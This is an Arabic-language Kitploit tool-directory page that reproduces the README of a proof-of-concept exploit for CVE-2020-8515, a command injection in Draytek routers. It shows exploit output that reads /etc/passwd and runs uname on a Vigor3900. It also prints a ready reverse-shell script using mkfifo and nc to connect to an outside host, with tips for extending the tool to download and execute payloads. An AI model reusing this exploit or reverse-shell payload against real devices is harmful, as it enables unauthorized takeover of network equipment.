Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2020-8515 — استغلال إثبات المفهوم لـ CVE-2020-8515 لحقن الأوامر في أجهزة توجيه Draytek. يتضمن استغلالًا آليًا وتسليم قشرة عكسية وتكاملًا مع قوالب فحص nuclei. | Kitploit
أدوات/GitHubGitHub/darrenmartyn/cve-2020-8515
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةأداة الوصول عن بعد
GitHubdarrenmartyn/cve-2020-8515

CVE-2020-8515

استغلال إثبات المفهوم لـ CVE-2020-8515 لحقن الأوامر في أجهزة توجيه Draytek. يتضمن استغلالًا آليًا وتسليم قشرة عكسية وتكاملًا مع قوالب فحص nuclei.

عرض المستودع
543منذ 5 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2020-8515

Draytek CVE-2020-8515 PoC كنت أحتفظ به.

المضحك أن الأمر المحقون يُنفَّذ مرتين، انظر هنا:

root@kitploit:~
$ ./draytek.py draytek.local
(>) executing command: cat /etc/passwd
(+) vulnerable!
(>) executing command: uname -a
Linux Vigor3900 2.6.33.5 #1 Wed Mar 28 00:49:28 CST 2018 armv6l unknown
Linux Vigor3900 2.6.33.5 #1 Wed Mar 28 00:49:28 CST 2018 armv6l unknown

كان لدي بعض الخطط لتحسين هذه الأداة بشكل جيد، ولكن بصراحة، لقد مر عام وأنا لا أتذكر ما كانت تلك الخطط، لذا ها هو. ليس من الصعب إضافة بعض أوامر wget/chmod/exec إلى هذا، فقط انظر في دالة "do_stuff".

إذا قمت بتنزيله باستخدام wget وقمت بتشغيل سكريبت مثل التالي، ستحصل على شل عكسي:

root@kitploit:~
#!/bin/sh
HOST="hacke.rs"
PORT=1337
rm -f /tmp/a; mkfifo /tmp/a; nc $HOST $PORT 0</tmp/a | /bin/sh >/tmp/a 2>&1; rm /tmp/a

أعتقد أنه يمكنك أيضاً تحميل مثل هذا السكريبت عبر echo إذا تمكنت من تجاوز الأحرف السيئة في الحقن، ربما سأضيف ذلك لاحقاً - مشكلة التنفيذ المزدوج تجعل ذلك مرهقاً بعض الشيء. في الوقت الحالي، هذا نصف مكتمل، "المستخدم يقرر".

لن يسبب هذا الاستغلال ضرراً كبيراً في العالم الحقيقي (ITW)، فجميع الأجهزة المعرضة لهذا ربما تم استغلالها بالفعل من قبل بوتينات DDoS للمبتدئين.

للمسح الضوئي: استخدم قالب nuclei الذي صنعه شخص ما

تنزيل الأداة